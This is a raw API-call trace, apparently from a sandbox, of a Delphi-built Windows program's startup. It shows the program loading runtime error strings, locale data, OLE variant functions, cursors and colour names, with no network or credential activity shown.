[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18f834, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x18f820, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0147.867] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18f820, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0147.867] GetVersionExA (in: lpVersionInformation=0x18fbb8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbb8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0147.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0147.868] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0147.868] GetThreadLocale () returned 0x409
[0147.868] GetThreadLocale () returned 0x409
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Jan") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fa90, cchData=256 | out: lpLCData="January") returned 8
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Feb") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fa90, cchData=256 | out: lpLCData="February") returned 9
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Mar") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fa90, cchData=256 | out: lpLCData="March") returned 6
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Apr") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fa90, cchData=256 | out: lpLCData="April") returned 6
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fa90, cchData=256 | out: lpLCData="May") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fa90, cchData=256 | out: lpLCData="May") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Jun") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fa90, cchData=256 | out: lpLCData="June") returned 5
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Jul") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fa90, cchData=256 | out: lpLCData="July") returned 5
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Aug") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fa90, cchData=256 | out: lpLCData="August") returned 7
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Sep") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fa90, cchData=256 | out: lpLCData="September") returned 10
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Oct") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fa90, cchData=256 | out: lpLCData="October") returned 8
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Nov") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fa90, cchData=256 | out: lpLCData="November") returned 9
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Dec") returned 4
[0147.868] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fa90, cchData=256 | out: lpLCData="December") returned 9
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Sun") returned 4
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Sunday") returned 7
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Mon") returned 4
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Monday") returned 7
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Tue") returned 4
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Tuesday") returned 8
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Wed") returned 4
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Wednesday") returned 10
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Thu") returned 4
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Thursday") returned 9
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Fri") returned 4
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Friday") returned 7
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Sat") returned 4
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fa90, cchData=256 | out: lpLCData="Saturday") returned 9
[0147.869] GetThreadLocale () returned 0x409
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18faec, cchData=256 | out: lpLCData="$") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18faec, cchData=256 | out: lpLCData="0") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18faec, cchData=256 | out: lpLCData="0") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fbe4, cchData=2 | out: lpLCData=",") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fbe4, cchData=2 | out: lpLCData=".") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18faec, cchData=256 | out: lpLCData="2") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fbe4, cchData=2 | out: lpLCData="/") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18faec, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0147.869] GetThreadLocale () returned 0x409
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fab8, cchData=256 | out: lpLCData="1") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18faec, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0147.869] GetThreadLocale () returned 0x409
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fab8, cchData=256 | out: lpLCData="1") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fbe4, cchData=2 | out: lpLCData=":") returned 2
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18faec, cchData=256 | out: lpLCData="AM") returned 3
[0147.869] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18faec, cchData=256 | out: lpLCData="PM") returned 3
[0147.870] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18faec, cchData=256 | out: lpLCData="0") returned 2
[0147.870] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18faec, cchData=256 | out: lpLCData="0") returned 2
[0147.870] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18faec, cchData=256 | out: lpLCData="0") returned 2
[0147.870] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fbe4, cchData=2 | out: lpLCData=",") returned 2
[0147.870] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0147.870] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0147.871] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0147.872] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0147.872] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0147.872] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0147.872] GetDC (hWnd=0x0) returned 0x6401085e
[0147.872] GetDeviceCaps (hdc=0x6401085e, index=90) returned 96
[0147.872] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0147.872] GetDC (hWnd=0x0) returned 0x6401085e
[0147.872] GetDeviceCaps (hdc=0x6401085e, index=104) returned 0
[0147.872] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0147.872] CreatePalette (plpal=0x18f848) returned 0x3908083b
[0147.872] GetStockObject (i=7) returned 0x1b00017
[0147.872] GetStockObject (i=5) returned 0x1900015
[0147.872] GetStockObject (i=13) returned 0x18a002e
[0147.872] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0147.872] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0147.873] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0147.873] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0147.874] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0147.875] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x18f844, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0147.875] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0147.875] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0147.876] GetVersion () returned 0x1db10106
[0147.876] GetCurrentProcessId () returned 0x734
[0147.876] GlobalAddAtomA (lpString="Delphi00000734") returned 0xc11e
[0147.876] GetCurrentThreadId () returned 0x524
[0147.876] GlobalAddAtomA (lpString="ControlOfs0040000000000524") returned 0xc11d
[0147.876] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000524") returned 0xc178
[0147.876] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0147.876] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0147.876] GetSystemMetrics (nIndex=19) returned 1
[0147.884] GetSystemMetrics (nIndex=75) returned 1
[0147.884] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1311310, fWinIni=0x0 | out: pvParam=0x1311310) returned 1
[0147.885] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0147.885] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0147.885] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x801b3
[0147.885] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0147.885] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0147.885] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0147.885] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0xb022d
[0147.885] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x90221
[0147.886] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x9021d
[0147.886] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x90219
[0147.886] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xa0217
[0147.886] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xa0215
[0147.886] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0147.886] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
